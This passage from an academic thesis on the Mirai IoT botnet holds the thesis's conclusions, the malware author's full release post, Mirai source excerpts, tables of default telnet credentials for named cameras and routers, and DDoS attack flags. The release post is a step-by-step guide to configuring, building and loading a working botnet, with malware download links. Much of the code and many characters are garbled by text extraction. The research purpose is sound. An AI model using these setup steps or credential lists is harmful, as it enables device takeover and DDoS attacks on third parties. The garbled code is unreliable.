6.3 TakeawaysIn this thesis we hoped to provide an in-depth analysis of a preeminent cyber threat in the worldtoday. We hope to lay the ground work for researchers and users interested in protecting theInternet of Things against malware like Mirai. We investigated the code to discover how exactlyMirai works. We watched Mirai in the wild to further investigate its behavior. We saw that IoTbotnets are extremely widespread, that they are targeting a variety of vulnerable IoT devices, andthat deep-packet inspection of the scanning tra�c can distinguish malicious from benign tra�c.

The arms race between adversaries and defenders will continue to escalate. In the future, it islikely that if researchers get more intelligent at tracking and taking down Mirai botnets, botnetswill not get as large and botnet creators will have to update their code to better avoid detection,hopefully causing the spread to slow. It is also a guarantee that adversaries will fine-tune Mirai oreven attack other weaknesses present in the Internet of Things. This will force security researchersto rethink their strategies.

Unfortunately, the complete security of the Internet of Things cannot come from researchersalone. We need to better educate consumers on the importance of security in their connectedhome. In a 2017 study by Pew Research Center, only 16% percent of adults surveyed evenknew what a botnet was [43]! Thus, the real change needs to come from manufacturers andgovernments. Manufacturers need to take more responsibility and implement better securityin their devices. As we’ve seen with Hikvision, Samsung, and Panasonic, the picture is slowlybecoming less bleak [42]. Governments need to work to ensure that the devices made and sold intheir countries implement good security practices. This is already happening. In January 2017,the Federal Trade Commission filed a lawsuit against D-Link for implementing bad security intheir products and for failing to address known security flaws [44].

Adversaries in the past - especially in the case of IoT - will target the easiest vulnerabilities

possible. This trend will definitely continue, unless manufacturers begin to require more secureauthentication, users begin to understand security in the IoT world, and more stringent securityrequirements are implemented by governments. By getting rid of the low hanging fruit, we canonce again raise the barrier of entry for malicious entities and cripple these extremely powerfulbotnets. Unfortunately, the situation will only get worse before it gets better.

In the meantime, we hope that our investigation helps to begin the process of implementingbetter security in this new era.

Appendix A|Mirai Botnet Source Code Se-lections

This appendix contains excerpts of the Mirai source code which was released in early October byits supposed author, Anna-senpai on the hacker website Hackforums [28]. It was soon released onGithub by the user jgamblin [7], which is the code analyzed in this thesis. Section A.1 containsthe text of the blog post accompanying the release of the malware on Hackerforums. It has somenotable information on setting up the bot. In addition, it gives us an insight into the writer’spersonality, which can be very valuable in determining who they are, what they used Mirai for,and why they released it.

A.1 Hackerforums Blog Post[FREE] World’s Largest Net:Mirai Botnet, Client, Echo Loader, CNC source code release -Anna-senpai - 09-30-2016 11:50 AM

A.1.1 PrefaceGreetz everybody, When I first go in DDoS industry, I wasn’t planning on staying in it long. Imade my money, there’s lots of eyes looking at IOT now, so it’s time to GTFO. However, I knowevery skid and their mama, it’s their wet dream to have something besides qbot.So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnetalone. However, after the Kreb DDoS, ISPs been slowly shutting down and cleaning up their act.Today, max pull is about 300k bots, and dropping.So, I am your senpai, and I will treat you real nice, my hf-chan.And to everyone that thought they were doing anything by hitting my CNC, I had good laughs,this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lolAlso, shoutout to this blog post by malwaremustdie

• http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html

38

• https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html <- backup in case low quality reverse engineer unixf-reaxjp decides to edit his posts lol

Had a lot of respect for you, thought you were good reverser, but you really just completely andtotally failed in reversing this binary. "We still have better kung fu than you kiddos" don’t makeme laugh please, you made so many mistakes and even confused some di�erent binaries with my.LOLLet me give you some slaps back -

1. port 48101 is not for back connect, it is for control to prevent multiple instances of botrunning together

2. /dev/watchdog and /dev/misc are not for "making the delay", it for preventing system fromhanging. This one is low-hanging fruit, so sad that you are extremely dumb

3. You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol"And doing the backdoor to connect via HTTP on 65.222.202.53". you got tripped up bysignal flow ;) try harder skiddo

4. Your skeleton tool sucks ass, it thought the attack decoder was "sinden style", but it doesnot even use a text-based protocol? CNC and bot communicate over binary protocol

5. you say ’chroot("/") so predictable like torlus’ but you don’t understand, some others killbased on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland

5 slaps for youWhy are you writing reverse engineer tools? You cannot even correctly reverse in the first place.Please learn some skills first before trying to impress others. Your arrogance in declaring howyou "beat me" with your dumb kung-fu statement made me laugh so hard while eating my SOhad to pat me on the back.Just as I forever be free, you will be doomed to mediocracy forever.

A.1.2 RequirementsBare Minimum2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loadingPro Setup (my setup)2 VPS and 4 servers

• 1 VPS with extremely bulletproof host for database server

• 1 VPS, rootkitted, for scanReceiver and distributor

• 1 server for CNC (used like 2

• 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)

A.1.3 Infrastructure Overview• To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to

that IP address

• Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one inqbot, and uses almost 20x less resources. When finding bruted result, bot resolves anotherdomain and reports it. This is chained to a separate server to automatically load ontodevices as results come in.

• Bruted results are sent by default on port 48101. The utility called scanListen.go in tools isused to receive bruted results (I was getting around 500 bruted results per second at peak).If you build in debug mode, you should see the utitlity scanListen binary appear in debugfolder.

Mirai uses a spreading mechanism similar to self-rep, but what I call "real-time-load". Basically,bots brute results, send it to a server listening with scanListen utility, which sends the results tothe loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.The loader can be configured to use multiple IP address to bypass port exhaustion in linux (thereare limited number of ports available, which means that there is not enough variation in tuple toget more than 65k simultaneous outbound connections - in theory, this value lot less). I wouldhave maybe 60k - 70k simultaneous outbound connections (simultaneous loading) spread outacross 5 IPs.

A.1.4 Configuring BotBot has several configuration options that are obfuscated in (table.c/table.h). In./mirai/bot/table.h you can find most descriptions for configuration options. However, in./mirai/bot/table.c there are a few options you *need* to change to get working.

• TABLE_CNC_DOMAIN - Domain name of CNC to connect to - DDoS avoidance veryfun with mirai, people try to hit my CNC but I update it faster than they can find new IPs,lol. Retards :)

• TABLE_CNC_PORT - Port to connect to, its set to 23 already

• TABLE_SCAN_CB_DOMAIN - When finding bruted results, this domain it is reported to

• TABLE_SCAN_CB_PORT - Port to connect to for bruted results, it is set to 48101already.

In ./mirai/tools you will find something called enc.c - You must compile this to output things toput in the table.c fileRun this inside mirai directory

./build.sh debug telnet

You will get some errors related to cross-compilers not being there if you have not configuredthem. This is ok, won’t a�ect compiling the enc toolNow, in the ./mirai/debug folder you should see a compiled binary called enc. For example, toget obfuscated string for domain name for bots to connect to, use this:

./debug/enc string fuck.the.police.com

The output should look like thisXOR’ing 20 bytes of data... \x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with theone provided by enc tool. Also, you see "XOR’ing 20 bytes of data". This value must replace thelast argument tas well. So for example, the table.c line originally looks like thisadd_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.comNow that we know value from enc tool, we update it like this add_entry(TABLE_CNC_DOMAIN,"\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22ÃÊâ∆�â�ü", 20); // fuck.the.police.comSome values are strings, some are port (uint16 in network order / big endian).

A.1.5 Configuring CNCapt-get install mysql-server mysql-client

CNC requires database to work. When you install database, go into it and run following commands:http://pastebin.com/86d0iL9gThis will create database for you. To add your user, INSERT INTO users VALUES (NULL,’anna-senpai’, ’myawesomepassword’,0, 0, 0, 0, -1, 1, 30, ”);Now, go into file ./mirai/cnc/main.goEdit these values

const DatabaseAddr string = "127.0.0.1"const DatabaseUser string = "root"const DatabasePass string = "password"const DatabaseTable string = "mirai"

To the information for the mysql server you just installed

A.1.6 Setting Up Cross CompilersCross compilers are easy, follow the instructions at this link to set up. You must restart yoursystem or reload .bashrc file for these changes to take e�ect.http://pastebin.com/1rRCc3aD

A.1.7 Building CNC + BotThe CNC, bot, and related tools:

1. http://santasbigcandycane.cx/mirai.src.zip - THESE LINKS WILL NOT LASTFOREVER, 2 WEEKS MAX - BACK IT UP!

2. http://santasbigcandycane.cx/loader.src.zip - THESE LINKS WILL NOT LASTFOREVER, 2 WEEKS MAX - BACK IT UP!

A.1.7.1 How to build bot + CNC

In mirai folder, there is build.sh script.

./build.sh debug telnet

Will output debug binaries of bot that will not daemonize and print out info about if it canconnect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder

./build.sh release telnet

Will output production-ready binaries of bot that are extremely stripped, small (about 60K) thatshould be loaded onto devices. Compiles all binaries in format: "mirai.$ARCH" to ./mirai/releasefolder

A.1.8 Building Echo LoaderLoader reads telnet entries from STDIN in following format:

ip:port user:pass

It detects if there is wget or tftp, and tries to download the binary using that. If not, it willechoload a tiny binary (about 1kb) that will su�ce as wget. You can find code to compile thetiny downloader stub here http://santasbigcandycane.cx/dlr.src.zipYou need to edit your main.c for the dlr to include the HTTP server IP. The idea is, if the iotdevice doesn have tftp or wget, then it will echo load this 2kb binary, which download the realbinary, since echo loading really slow. When you compile, place your dlr.* files into the folder./bins for the loader

./build.sh

Will build the loader, optimized, production use, no fuss. If you have a file in formats used forloading, you can do this

cat file.txt | ./loader

Remember to ulimit!Just so it’s clear, I’m not providing any kind of 1 on 1 help tutorials or shit, too much time. Allscripts and everything are included to set up working botnet in under 1 hours. I am willing tohelp if you have individual questions (how come CNC not connecting to database, I did this thisthis blah blah), but not questions like "My bot not connect, fix it"

A.2 Custom Data StructuresThe Mirai code defines several custom data structures, the most important of which are listedhere.

A.2.1 Connection Structure

Listing A.1. Connection Struct1 struct server_worker {2 struct s e r v e r � s rv ;3 int e fd ; // We c r ea t e a separa te e p o l l con tex t per thread so thread s a f e t y4 // i sn ’ t our problem5 pthread_t thread ;6 uint8_t thread_id ;7 } ;89 struct s e r v e r {

10 uint32_t max_open ;11 volat i le uint32_t curr_open ;12 volat i le uint32_t tota l_input , t o t a l _ l o g i n s , tota l_echoes , total_wgets ,13 t o t a l _ t f t p s , t o t a l _ s u c c e s s e s , t o t a l _ f a i l u r e s ;14 char �wget_host_ip , � t ftp_host_ip ;15 struct server_worker � workers ;16 struct connect ion �� estab_conns ;17 ipv4_t � bind_addrs ;18 pthread_t to_thrd ;19 port_t wget_host_port ;20 uint8_t workers_len , bind_addrs_len ;21 int curr_worker_chi ld ;22 } ;2324 struct binary {25 char arch [ 6 ] ;26 int hex_payloads_len ;27 char �� hex_payloads ;28 } ;2930 struct t e l n e t _ i n f o {31 char user [ 3 2 ] , pass [ 3 2 ] , arch [ 6 ] , w r i t e d i r [ 3 2 ] ;32 ipv4_t addr ;33 port_t port ;34 enum {35 UPLOAD_ECHO,36 UPLOAD_WGET,37 UPLOAD_TFTP38 } upload_method ;39 BOOL has_auth , has_arch ;40 } ;4142 struct connect ion {

43 pthread_mutex_t lock ;44 struct s e r v e r � s rv ;45 struct binary � bin ;46 struct t e l n e t _ i n f o i n f o ;47 int fd , echo_load_pos ;48 time_t la s t_recv ;49 enum {50 TELNET_CLOSED, // 051 TELNET_CONNECTING, // 152 TELNET_READ_IACS, // 253 TELNET_USER_PROMPT, // 354 TELNET_PASS_PROMPT, // 455 TELNET_WAITPASS_PROMPT, // 556 TELNET_CHECK_LOGIN, // 657 TELNET_VERIFY_LOGIN, // 758 TELNET_PARSE_PS, // 859 TELNET_PARSE_MOUNTS, // 960 TELNET_READ_WRITEABLE, // 1061 TELNET_COPY_ECHO, // 1162 TELNET_DETECT_ARCH, // 1263 TELNET_ARM_SUBTYPE, // 1364 TELNET_UPLOAD_METHODS, // 1465 TELNET_UPLOAD_ECHO, // 1566 TELNET_UPLOAD_WGET, // 1667 TELNET_UPLOAD_TFTP, // 1768 TELNET_RUN_BINARY, // 1869 TELNET_CLEANUP // 1970 } s t a t e _ t e l n e t ;71 struct {72 char data [ 5 1 2 ] ;73 int d e a d l i n e ;74 } output_buffer ;75 uint16_t rdbuf_pos , t imeout ;76 BOOL open , succes s , retry_bin , c t r l c _ r e t r y ;77 uint8_t rdbuf [ 8 1 9 2 ] ;78 } ;

A.2.2 Scanner Connection Structure

Listing A.2. Scanner Connection Struct1 struct scanner_auth {2 char �username ;3 char � password ;4 uint16_t weight_min , weight_max ;5 uint8_t username_len , password_len ;6 } ;78 struct scanner_connect ion {9 struct scanner_auth �auth ;

10 int fd , l a s t_recv ;

11 enum {12 SC_CLOSED,13 SC_CONNECTING,14 SC_HANDLE_IACS,15 SC_WAITING_USERNAME,16 SC_WAITING_PASSWORD,17 SC_WAITING_PASSWD_RESP,18 SC_WAITING_ENABLE_RESP,19 SC_WAITING_SYSTEM_RESP,20 SC_WAITING_SHELL_RESP,21 SC_WAITING_SH_RESP,22 SC_WAITING_TOKEN_RESP23 } s t a t e ;24 ipv4_t dst_addr ;25 uint16_t dst_port ;26 int rdbuf_pos ;27 char rdbuf [SCANNER_RDBUF_SIZE ] ;28 uint8_t t r i e s ;29 } ;

A.2.3 Command and Control Client ListGo implements a data type called channels, (see chan in code) which are "pipes that connectconcurrent goroutines" [45]. Essentially, channels allow sending and receiving between goroutines(i.e. functions) while implementing blocking.

Listing A.3. CNC Client List Struct1 type Bot struct {2 uid int

3 conn net . Conn4 v e r s i o n byte

5 source string

6 }78 type C l i e n t L i s t struct {9 uid int

10 count int

11 c l i e n t s map[ int ] � Bot12 addQueue chan �Bot13 delQueue chan �Bot14 atkQueue chan �AttackSend15 totalCount chan int

16 cntView chan int

17 distViewReq chan int

18 distViewRes chan map[ string ] int

19 cntMutex � sync . Mutex20 }

A.3 Constants Table

1 /� Generic bot i n f o �/2 #define TABLE_PROCESS_ARGV 13 #define TABLE_EXEC_SUCCESS 24 #define TABLE_CNC_DOMAIN 35 #define TABLE_CNC_PORT 467 /� K i l l e r data �/8 #define TABLE_KILLER_SAFE 59 #define TABLE_KILLER_PROC 6

10 #define TABLE_KILLER_EXE 711 #define TABLE_KILLER_DELETED 8 /� " ( d e l e t e d )" �/12 #define TABLE_KILLER_FD 9 /� "/ fd " �/13 #define TABLE_KILLER_ANIME 10 /� . anime �/14 #define TABLE_KILLER_STATUS 1115 #define TABLE_MEM_QBOT 1216 #define TABLE_MEM_QBOT2 1317 #define TABLE_MEM_QBOT3 1418 #define TABLE_MEM_UPX 1519 #define TABLE_MEM_ZOLLARD 1620 #define TABLE_MEM_REMAITEN 172122 /� Scanner data �/23 #define TABLE_SCAN_CB_DOMAIN 18 /� domain to connect to �/24 #define TABLE_SCAN_CB_PORT 19 /� Port to connect to �/25 #define TABLE_SCAN_SHELL 20 /� ’ s h e l l ’ to enab le s h e l l access �/26 #define TABLE_SCAN_ENABLE 21 /� ’ enab le ’ to enab le s h e l l access �/27 #define TABLE_SCAN_SYSTEM 22 /� ’ system ’ to enab le s h e l l access �/28 #define TABLE_SCAN_SH 23 /� ’ sh ’ to enab le s h e l l access �/29 #define TABLE_SCAN_QUERY 24 /� echo hex s t r i n g to v e r i f y l o g i n �/30 #define TABLE_SCAN_RESP 25 /� u t f 8 ver s ion o f query s t r i n g �/31 #define TABLE_SCAN_NCORRECT 2632 /� ’ ncorrec t ’ to f a s t ≠check f o r i n v a l i d password �/33 #define TABLE_SCAN_PS 27 /� "/ bin / busybox ps " �/34 #define TABLE_SCAN_KILL_9 28 /� "/ bin / busybox k i l l ≠9 " �/3536 /� Attack s t r i n g s �/37 #define TABLE_ATK_VSE 29 /� TSource Engine Query �/38 #define TABLE_ATK_RESOLVER 30 /� / e t c / r e s o l v . conf �/39 #define TABLE_ATK_NSERV 31 /� " nameserver " �/4041 #define TABLE_ATK_KEEP_ALIVE 32 /� " Connection : keep≠a l i v e " �/42 #define TABLE_ATK_ACCEPT 3343 // " Accept : t e x t /html , a p p l i c a t i o n / xhtml+xml , a p p l i c a t i o n /xml ; q =0.9 , image/webp ,44 �/� ; q =0.8" // �/45 #define TABLE_ATK_ACCEPT_LNG 34 // " Accept≠Language : en≠US, en ; q =0.8"46 #define TABLE_ATK_CONTENT_TYPE 3547 // " Content≠Type : a p p l i c a t i o n /x≠www≠form≠ur lencoded "48 #define TABLE_ATK_SET_COOKIE 36 // " se tCookie ( ’ "49 #define TABLE_ATK_REFRESH_HDR 37 // " r e f r e s h : "

50 #define TABLE_ATK_LOCATION_HDR 38 // " l o c a t i o n : "51 #define TABLE_ATK_SET_COOKIE_HDR 39 // " set ≠cook ie : "52 #define TABLE_ATK_CONTENT_LENGTH_HDR 40 // " content≠l e n g t h : "53 #define TABLE_ATK_TRANSFER_ENCODING_HDR 41 // " t r a n s f e r ≠encoding : "54 #define TABLE_ATK_CHUNKED 42 // " chunked "55 #define TABLE_ATK_KEEP_ALIVE_HDR 43 // " keep≠a l i v e "56 #define TABLE_ATK_CONNECTION_HDR 44 // " connect ion : "57 #define TABLE_ATK_DOSARREST 45 // " s e r v e r : d o s a r r e s t "58 #define TABLE_ATK_CLOUDFLARE_NGINX 46 // " s e r v e r : c l o u d f l a r e ≠nginx "5960 /� User agent s t r i n g s �/61 #define TABLE_HTTP_ONE 4762 /� " Moz i l l a /5.0 (Windows NT 1 0 . 0 ; WOW64) AppleWebKit /537.36 (KHTML, l i k e Gecko )63 Chrome /51.0 .2704.103 S a f a r i /537.36" �/64 #define TABLE_HTTP_TWO 4865 /� " Moz i l l a /5.0 (Windows NT 1 0 . 0 ; WOW64) AppleWebKit /537.36 (KHTML, l i k e Gecko )66 Chrome /52.0 .2743.116 S a f a r i /537.36" �/67 #define TABLE_HTTP_THREE 4968 /� " Moz i l l a /5.0 (Windows NT 6 . 1 ; WOW64) AppleWebKit /537.36 (KHTML, l i k e Gecko )69 Chrome /51.0 .2704.103 S a f a r i /537.36" �/70 #define TABLE_HTTP_FOUR 5071 /� " Moz i l l a /5.0 (Windows NT 6 . 1 ; WOW64) AppleWebKit /537.36 (KHTML, l i k e Gecko )72 Chrome /52.0 .2743.116 S a f a r i /537.36" �/73 #define TABLE_HTTP_FIVE 5174 /� " Moz i l l a /5.0 ( Macintosh ; I n t e l Mac OS X 10_11_6) AppleWebKit /601.7 .775 (KHTML, l i k e Gecko ) Version /9 .1 .2 S a f a r i /601 .7 .7" �/7677 #define TABLE_MAX_KEYS 52 /� Highes t va lue + 1 �/

A.4 Built-in Encoding and Decoding

A.4.1 Encoding Functionality

1 stat ic uint32_t table_key = 0 xdeadbeef ;23 void �x ( void � , int ) ;45 int main ( int argc , char �� args )6 {7 void � data ;8 int len , i ;9

10 i f ( argc != 3)11 {12 p r i n t f ( " Usage : �%s �<s t r i n g � | � ip � | � uint32 � | � uint16 � | � uint8 � | � bool>13 �� <data>\n " , args [ 0 ] ) ;14 return 0 ;15 }16

17 i f ( strcmp ( args [ 1 ] , " s t r i n g " ) == 0)18 {19 data = args [ 2 ] ;20 l en = s t r l e n ( args [ 2 ] ) + 1 ;21 }22 else i f ( strcmp ( args [ 1 ] , " ip " ) == 0)23 {24 data = c a l l o c (1 , s izeof ( uint32_t ) ) ;25 � ( ( uint32_t �) data ) = inet_addr ( args [ 2 ] ) ;26 l en = s izeof ( uint32_t ) ;27 }28 else i f ( strcmp ( args [ 1 ] , " u int32 " ) == 0)29 {30 data = c a l l o c (1 , s izeof ( uint32_t ) ) ;31 � ( ( uint32_t �) data ) = hton l ( ( uint32_t ) a t o i ( args [ 2 ] ) ) ;32 l en = s izeof ( uint32_t ) ;33 }34 else i f ( strcmp ( args [ 1 ] , " u int16 " ) == 0)35 {36 data = c a l l o c (1 , s izeof ( uint16_t ) ) ;37 � ( ( uint16_t �) data ) = htons ( ( uint16_t ) a t o i ( args [ 2 ] ) ) ;38 l en = s izeof ( uint16_t ) ;39 }40 else i f ( strcmp ( args [ 1 ] , " u int8 " ) == 0)41 {42 data = c a l l o c (1 , s izeof ( uint8_t ) ) ;43 � ( ( uint8_t �) data ) = a t o i ( args [ 2 ] ) ;44 l en = s izeof ( uint8_t ) ;45 }46 else i f ( strcmp ( args [ 1 ] , " bool " ) == 0)47 {48 data = c a l l o c (1 , s izeof ( char ) ) ;49 i f ( strcmp ( args [ 2 ] , " f a l s e " ) == 0)50 ( ( char �) data ) [ 0 ] = 0 ;51 else i f ( strcmp ( args [ 2 ] , " t rue " ) == 0)52 ( ( char �) data ) [ 0 ] = 1 ;53 else

54 {55 p r i n t f ( "Unknown� value � ‘%s ‘ � f o r � datatype � bool ! \ n " , a rgs [ 2 ] ) ;56 return ≠1;57 }58 l en = s izeof ( char ) ;59 }60 else

61 {62 p r i n t f ( "Unknown� data � type � ‘%s ‘ ! \ n " , a rgs [ 1 ] ) ;63 return ≠1;64 }6566 // Yes we are l e a k i n g memory , but the program i s so67 // s ho r t l i v e d t h a t i t doesn ’ t r e a l l y matter . . .68 p r i n t f ( "XOR’ ing �%d� bytes � o f � data . . . \ n " , l en ) ;

69 data = x ( data , l en ) ;70 for ( i = 0 ; i < l en ; i++)71 p r i n t f ( " \\x%02X" , ( ( unsigned char �) data ) [ i ] ) ;72 p r i n t f ( " \n " ) ;73 }7475 void �x ( void �_buf , int l en )76 {77 unsigned char � buf = ( char �) _buf , � out = mal loc ( l en ) ;78 int i ;79 uint8_t k1 = table_key & 0 x f f ,80 k2 = ( table_key >> 8) & 0 x f f ,81 k3 = ( table_key >> 16) & 0 x f f ,82 k4 = ( table_key >> 24) & 0 x f f ;8384 for ( i = 0 ; i < l en ; i++)85 {86 char tmp = buf [ i ] ^ k1 ;8788 tmp ^= k2 ;89 tmp ^= k3 ;90 tmp ^= k4 ;9192 out [ i ] = tmp ;93 }9495 return out ;96 }

A.4.2 Decoding Functionality

1 stat ic char � deobf ( char � s t r , int � l en )2 {3 int i ;4 char �cpy ;56 � l en = u t i l _ s t r l e n ( s t r ) ;7 cpy = mal loc (� l en + 1 ) ;89 util_memcpy ( cpy , s t r , � l en + 1 ) ;

1011 for ( i = 0 ; i < � l en ; i++)12 {13 cpy [ i ] ^= 0xDE;14 cpy [ i ] ^= 0xAD;15 cpy [ i ] ^= 0xBE;16 cpy [ i ] ^= 0xEF ;17 }1819 return cpy ;20 }

2122 stat ic void add_auth_entry ( char � enc_user , char �enc_pass , uint16_t weight )23 {24 int tmp ;2526 auth_table = r e a l l o c ( auth_table , ( auth_table_len + 1) �27 s izeof ( struct scanner_auth ) ) ;28 auth_table [ auth_table_len ] . username = deobf ( enc_user , &tmp ) ;29 auth_table [ auth_table_len ] . username_len = ( uint8_t )tmp ;30 auth_table [ auth_table_len ] . password = deobf ( enc_pass , &tmp ) ;31 auth_table [ auth_table_len ] . password_len = ( uint8_t )tmp ;32 auth_table [ auth_table_len ] . weight_min = auth_table_max_weight ;33 auth_table [ auth_table_len ++].weight_max = auth_table_max_weight + weight ;34 auth_table_max_weight += weight ;35 }3637 stat ic struct scanner_auth �random_auth_entry ( void )38 {39 /� This method i s used to s e l e c t an auth combination to t r y . �/40 int i ;41 uint16_t r = ( uint16_t ) ( rand_next ( ) % auth_table_max_weight ) ;4243 for ( i = 0 ; i < auth_table_len ; i++)44 {45 i f ( r < auth_table [ i ] . weight_min )46 continue ;47 else i f ( r < auth_table [ i ] . weight_max )48 return &auth_table [ i ] ;49 }5051 return NULL;52 }

Appendix B|Supplemental Data

B.1 Hardcoded List of Default CredentialsMirai attempts to log into devices via telnet on either port 23 or 2323, using a hardcoded listof default credentials. This list is defined and built in scanner.c within the scanner_init()method.

Username Password1 666666 6666662 888888 8888883 Administrator admin4 admin [empty string]5 admin 11116 admin 11111117 admin 12348 admin 123459 admin 12345610 admin 5432111 admin 7ujMko0admin12 admin admin13 admin admin123414 admin meinsm15 admin pass16 admin password17 admin smcadmin18 admin1 password19 administrator 123420 guest 1234521 guest guest

51

22 mother fucker23 root [empty string]24 root 0000000025 root 111126 root 123427 root 1234528 root 12345629 root 5432130 root 66666631 root 7ujMko0admin32 root 7ujMko0vizxv33 root 88888834 root Zte52135 root admin36 root anko37 root default38 root dreambox39 root hi351840 root ikwb41 root jvbzd42 root juantech43 root klv12344 root klv123445 root pass46 root password47 root realtek48 root root49 root system50 root user51 root vizxv52 root xc351153 root xmhdipc54 root zlxx.55 service service56 supervisor supervisor57 support support58 tech tech59 ubnt ubnt60 user user

Table B.1: Default Credentials Used by Mirai

B.2 Credentials Seen in CollectionsThe following credentials were all seen in the data collection in this experiment. All hardcodedMirai credentials were seen in our collections. Many of the other combinations seemed to havebeen derived from these username and password combinations. Some device identification wascompleted by Brian Krebs in [31]. Many others can be found here: [46] [42] [47] [48] [49]. Ifunknown, the device field is blank. Additionally, please note that even if a product is named, itmay not be the only product using those credentials.

Username Password Device, if known In MiraiRelease?

1 1234 1234 common password X2 5up 5up SMC Router X3 666666 666666 Dahua IP Camera X4 888888 888888 Dahua DVR or IP Camera X5 !!Huawei @HuaweiHgw Huawei Router X6 Admin 111111 common password X7 Admin 5up SMC Router X8 Admin Admin common combination X9 Administrator admin X10 Administrator default X11 Administrator meinsm Mobotix Camera? X12 Administrator password common combination X13 Huawei Huawei Huawei Router X14 Manager manager X15 ROOT PASSWD X16 Zte521 Zte521 ZTE Router X17 admin [empty string] common X18 admin 1 X19 admin 11 X20 admin 1111 Xerox Printer X21 admin 11111 common password X22 admin 1111111 Samsung Camera X23 admin 11111111 X24 admin 123 X25 admin 1234 common combination X26 admin 12345 common combination X

27 admin 123456 ACTi IP Camera, Uniview IPCamera

X

28 admin 1234567 X29 admin 12345678 X30 admin 54321 X31 admin 5up SMC Router X32 admin 666666 Dahua IP Camera or DVR X33 admin 7ujMko0admin Dahua IP Camera X34 admin 888888 Dahua IP Camera or DVR X35 admin ZmqVfoSIP X36 admin admin common combination X37 admin admin1234 X38 admin admin888 X39 admin benq1234 X40 admin guest X41 admin ho4uku6at X42 admin meinsm Mobotix IP Camera X43 admin oelinux1234 X44 admin pass common combination X45 admin password common combination X46 admin private X47 admin root common combination X48 admin smcadmin SMC Router X49 admin1 password X50 administrator 1234 X51 administrator user X52 adminlvjh adminlvjh123 Chinese IP Camera X53 cisco cisco Cisco Router X54 cusadmin highspeed SMC Router X55 default S2fGqNFs HiSilicon IP Camera X56 default antslq X57 default tlJwpbo6 HiSilicon IP Camera X58 dvr dvr X59 e8ehome e8ehome Chinese Router X60 e8ehomeasb e8ehomeasb Chinese Router X61 e8telnet e8telnet Chinese Router X62 guest 12345 X63 guest admin X64 guest guest X

65 h3c h3c H3C Switch X66 huawei [email protected] Huawei Router X67 huawei huawei Huawei Router X68 mother fucker X69 netgear netgear Netgear Router X70 realtek realtek RealTek Router X71 root [empty string] common combination X72 root 0 X73 root 00000000 Panasonic Printer X74 root 0123456789 X75 root 1001chin X76 root 1111 X77 root 11111 X78 root 123 X79 root 1234 X80 root 12345 Comay Router X81 root 123456 X82 root 12345678 X83 root 123456789 X84 root 1234567890 X85 root 4321 X86 root 54321 Packet8 VOIP Phone X87 root 5up SMC Router X88 root 666666 Dahua DVR X89 root 7ujMko0admin Dahua IP Camera X90 root 7ujMko0vizxv Dahua IP Camera X91 root 888888 Dahua DVR X92 root 88888888 DVR X93 root GM8182 DVR X94 root PASSWD X95 root Zte521 ZTE Router X96 root admin common combination X97 root anko ANKO DVR X98 root cat1029 HiSilicon IP Camera X99 root cisco Cisco Router X100 root default X101 root dreambox Dreambox TV Receiver X102 root dvr DVR X103 root friend X

104 root grouter Shida 2110EH Router X105 root h3c H3C Switch X106 root hg2x0 Huawei Router X107 root hi3518 HiSilicon IP Camera X108 root hunt5759 X109 root ikwb Toshiba Network Camera X110 root juantech Guangzhou Juan Optical

DVRX

111 root jvbzd HiSilicon IP Camera X112 root klv123 HiSilicon IP Camera X113 root klv1234 HiSilicon IP Camera X114 root nmgx_wapia Chinese Router X115 root oelinux123 Telstra Mobile Router X116 root pass Axis IP Camera X117 root passwd X118 root password common combination X119 root private X120 root realtek RealTek Router X121 root root X122 root root123 X123 root root1234 X124 root root12345 X125 root root123456 X126 root root321 X127 root root4321 X128 root root54321 X129 root root654321 X130 root rootpassword X131 root rootroot X132 root solokey ZKSoftware Device X133 root system IQinVision IP Camera X134 root telecomadmin Huawei Router X135 root telnet X136 root tl789 X137 root twe8ehome Chinese Router X138 root user X139 root vizxv Dahua Camera X140 root xc3511 DVR Model Number H.264 X

141 root xmhdipc HiSilicon IP Camera, Shen-zhen Anran Security Camera

X

142 root zlxx. EV ZLX Speaker X143 service service X144 superadmin Is$uper@dmin Sagem F@st 2804 Router X145 supervisor supervisor VideoIQ IP Camera X146 support support X147 system system X148 tech tech 3COM (now HP) Router X149 telecomadmin nE7jA%5m Chinese Router X150 telnet telnet X151 telnetadmin telnetadmin X152 toor toor X153 ubnt ubnt Ubiquiti AirOS Router, Ubiq-

uiti IP CameraX

154 user password common combination X155 user qweasdzx X156 user user common combination X157 useradmin useradmin X158 zte zte ZTE Router X

Table B.2: Credentials Seen in Collections

B.3 Attack Types and FlagsUsers with access to a Mirai botnet account is able to execute a set list of attack types. Theyare all DDoS attacks of varying types and can be found in the attack.go in the mirai/cncsubdirectory. The information is consolidated into the following tables.

CommandName

Flag ID Flag Description

len 0 Size of packet data, default is 512 bytesrand 1 Randomize packet data content, default is 1 (yes)tos 2 TOS field value in IP header, default is 0ident 3 ID field value in IP header, default is randomttl 4 TTL field in IP header, default is 255df 5 Set the Dont-Fragment bit in IP header, default is 0 (no)sport 6 Source port, default is randomdport 7 Destination port, default is randomdomain 8 Domain name to attack

